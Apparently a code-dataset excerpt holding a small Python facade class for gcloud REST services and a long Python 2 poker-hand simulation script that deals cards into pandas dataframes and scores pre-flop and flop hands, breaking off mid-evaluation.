| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
793b887aec53d0115275fdbf3764951d56247bd8
| 417
|
py
|
Python
|
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | null | null | null |
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | 6
|
2020-04-29T09:09:48.000Z
|
2021-04-30T21:13:57.000Z
|
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | null | null | null |
from library.gcloud_accessor.rest_library.services.compute import GcloudCompute
from library.gcloud_accessor.rest_library.services.sqladmin import GcloudSqlAdmin
from library.gcloud_accessor.rest_library.services.redis import GcloudRedisV1
from library.gcloud_accessor.rest_library.services.storage import GcloudStorageV1
class GcloudRestLib(GcloudCompute, GcloudSqlAdmin, GcloudRedisV1, GcloudStorageV1):
    """Facade aggregating the per-service gcloud REST mixins.

    Combines the compute, SQL admin, Redis (v1) and storage (v1) REST
    libraries into a single client class via multiple inheritance.
    It defines no behavior of its own; everything comes from the bases.
    """
    pass
| 46.333333
| 83
| 0.880096
| 47
| 417
| 7.638298
| 0.382979
| 0.122563
| 0.189415
| 0.278552
| 0.490251
| 0.490251
| 0.490251
| 0
| 0
| 0
| 0
| 0.010283
| 0.067146
| 417
| 8
| 84
| 52.125
| 0.912596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 0.666667
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f70d3e28da9aa68e8d861ebac687968a147701ef
| 284,723
|
py
|
Python
|
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
import random
import pandas as pd
import numpy as np
df1 = pd.read_csv('train.csv')
df2 = pd.read_csv('train.csv')
df3 = pd.read_csv('train.csv')
df4 = pd.read_csv('train.csv')
df5 = pd.read_csv('train.csv')
for i in range(0,1000000):
for k in range (1,5):
x = 0
# Create Pre-Flop round
if k == 1:
df1.loc[i * 4 + k-1] = -1
df2.loc[i * 4 + k-1] = -1
df3.loc[i * 4 + k - 1] = -1
df4.loc[i * 4 + k - 1] = -1
df5.loc[i * 4 + k - 1] = -1
# Generate first card for P1
df1.iloc[i * 4 + k-1, 0] = random.randrange(1,5)
df1.iloc[i * 4 + k-1, 1] = random.randrange(2,15)
while x == 0:
print "Step 1"
# Generate 2nd card for P1
df1.iloc[i * 4 + k-1, 2] = random.randrange(1,5)
df1.iloc[i * 4 + k-1, 3] = random.randrange(2,15)
#Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 2] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 3] == df1.iloc[i * 4 + k-1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 2"
# Generate 2nd card for P2
df2.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df2.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df2.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df2.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df2.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 3] == \
df1.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 3"
# Generate 2nd card for P3
df3.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df3.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df3.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df3.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df3.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 4"
# Generate 2nd card for P4
df4.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df4.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df4.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df4.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df4.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 2])\
or (df4.iloc[i * 4 + k - 1, 2] == df3.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df3.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 5"
# Generate 2nd card for P5
df5.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df5.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df5.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df5.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df3.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df3.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df4.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df4.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 6"
# Generate 1st card for P2
df2.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df2.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df2.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df2.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df2.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 7"
# Generate 1st card for P3
df3.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df3.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df3.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df3.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df3.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 8"
# Generate 1st card for P4
df4.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df4.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df4.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df4.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df4.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df4.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1])\
or (df4.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 9"
# Generate 1st card for P5
df5.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df5.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df5.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df5.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df5.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1])\
or (df5.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 1]) \
or (df5.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
list = []
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
#Pre-flop Hand evaluation
#Evaluate each player's hand for a pair
if df1.iloc[i * 4 + k - 1, 1] == df1.iloc[i * 4 + k - 1, 3]:
list.append(df1.iloc[i * 4 + k - 1, 1])
if df2.iloc[i * 4 + k - 1, 1] == df2.iloc[i * 4 + k - 1, 3]:
list.append(df2.iloc[i * 4 + k - 1, 1])
if df3.iloc[i * 4 + k - 1, 1] == df3.iloc[i * 4 + k - 1, 3]:
list.append(df3.iloc[i * 4 + k - 1, 1])
if df4.iloc[i * 4 + k - 1, 1] == df4.iloc[i * 4 + k - 1, 3]:
list.append(df4.iloc[i * 4 + k - 1, 1])
if df5.iloc[i * 4 + k - 1, 1] == df5.iloc[i * 4 + k - 1, 3]:
list.append(df5.iloc[i * 4 + k - 1, 1])
#Check if more than one player have a pair
if (len(list) > 1):
winner = max(list)
if df1.iloc[i * 4 + k - 1, 1] == winner and df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner and df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner and df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner and df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner and df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check if only one player has a pair
elif (len(list) == 1):
winner = max(list)
if df1.iloc[i * 4 + k - 1, 1] == winner and df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
elif df2.iloc[i * 4 + k - 1, 1] == winner and df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
elif df3.iloc[i * 4 + k - 1, 1] == winner and df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
elif df4.iloc[i * 4 + k - 1, 1] == winner and df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
elif df5.iloc[i * 4 + k - 1, 1] == winner and df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
#Evaluate for the high card
else:
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],)
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
# Create Flop Round
if k == 2:
df1.loc[i * 4 + k-1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 10"
#Generate 1st community card
df1.iloc[i * 4 + k-1, 4] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 5] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df2.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df3.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df3.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df4.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df4.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df5.iloc[i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df5.iloc[i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 4] == df1.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df1.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k-1, 4] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 5] == df1.iloc[i * 4 + k-1, 1])\
or (df1.iloc[i * 4 + k-1, 4] == df2.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df2.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df3.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df3.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df4.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df4.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 4] == df5.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 5] == df5.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k - 1, 4] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 4] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 5] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 11"
# Generate 2nd community card
df1.iloc[i * 4 + k-1, 6] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 7] = random.randrange(2, 15)
df2.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df2.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df3.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df3.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df4.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df4.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
df5.iloc[i * 4 + k-1, 6] = df1.iloc[i * 4 + k-1, 6]
df5.iloc[i * 4 + k-1, 7] = df1.iloc[i * 4 + k-1, 7]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 4] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 5]) \
or (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k-1, 6] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 7] == df1.iloc[i * 4 + k-1, 1])\
or (df1.iloc[i * 4 + k-1, 6] == df2.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df2.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df3.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df3.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df4.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df4.iloc[i * 4 + k-1, 3])\
or (df1.iloc[i * 4 + k-1, 6] == df5.iloc[i * 4 + k-1, 2] and df1.iloc[i * 4 + k-1, 7] == df5.iloc[i * 4 + k-1, 3]) \
or (df1.iloc[i * 4 + k - 1, 6] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 6] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 7] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 12"
#Generate 3rd community card
df1.iloc[i * 4 + k-1, 8] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1, 9] = random.randrange(2, 15)
df2.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df2.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df3.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df3.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df4.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df4.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
df5.iloc[i * 4 + k-1, 8] = df1.iloc[i * 4 + k-1, 8]
df5.iloc[i * 4 + k-1, 9] = df1.iloc[i * 4 + k-1, 9]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[i * 4 + k - 1, 9] == df1.iloc[
i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 8] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[i * 4 + k - 1, 9] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 8] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 8] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[i * 4 + k - 1, 9] ==
df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 8] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 8] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 9] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
df2.iloc[i * 4 + k - 1, 4] = df3.iloc[i * 4 + k - 1, 4] = df4.iloc[i * 4 + k - 1, 4] = df5.iloc[
i * 4 + k - 1, 4] = df1.iloc[i * 4 + k - 1, 4]
df2.iloc[i * 4 + k - 1, 5] = df3.iloc[i * 4 + k - 1, 5] = df4.iloc[i * 4 + k - 1, 5] = df5.iloc[
i * 4 + k - 1, 5] = df1.iloc[i * 4 + k - 1, 5]
df2.iloc[i * 4 + k - 1, 6] = df3.iloc[i * 4 + k - 1, 6] = df4.iloc[i * 4 + k - 1, 6] = df5.iloc[
i * 4 + k - 1, 6] = df1.iloc[i * 4 + k - 1, 6]
df2.iloc[i * 4 + k - 1, 7] = df3.iloc[i * 4 + k - 1, 7] = df4.iloc[i * 4 + k - 1, 7] = df5.iloc[
i * 4 + k - 1, 7] = df1.iloc[i * 4 + k - 1, 7]
df2.iloc[i * 4 + k - 1, 8] = df3.iloc[i * 4 + k - 1, 8] = df4.iloc[i * 4 + k - 1, 8] = df5.iloc[
i * 4 + k - 1, 8] = df1.iloc[i * 4 + k - 1, 8]
df2.iloc[i * 4 + k - 1, 9] = df3.iloc[i * 4 + k - 1, 9] = df4.iloc[i * 4 + k - 1, 9] = df5.iloc[
i * 4 + k - 1, 9] = df1.iloc[i * 4 + k - 1, 9]
#Flop hand evaluation
x = 0
list = [-1,-1,-1,-1,-1]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
#Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#P1 Evaluation
#With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
for m in range (0,5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0]+1 == list[1] and list[1]+1 == list[2] and list[2]+1 == list[3] and list[3]+1 == list[4]:
a1 = max(list[0],list[1],list[2],list[3],list[4])
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
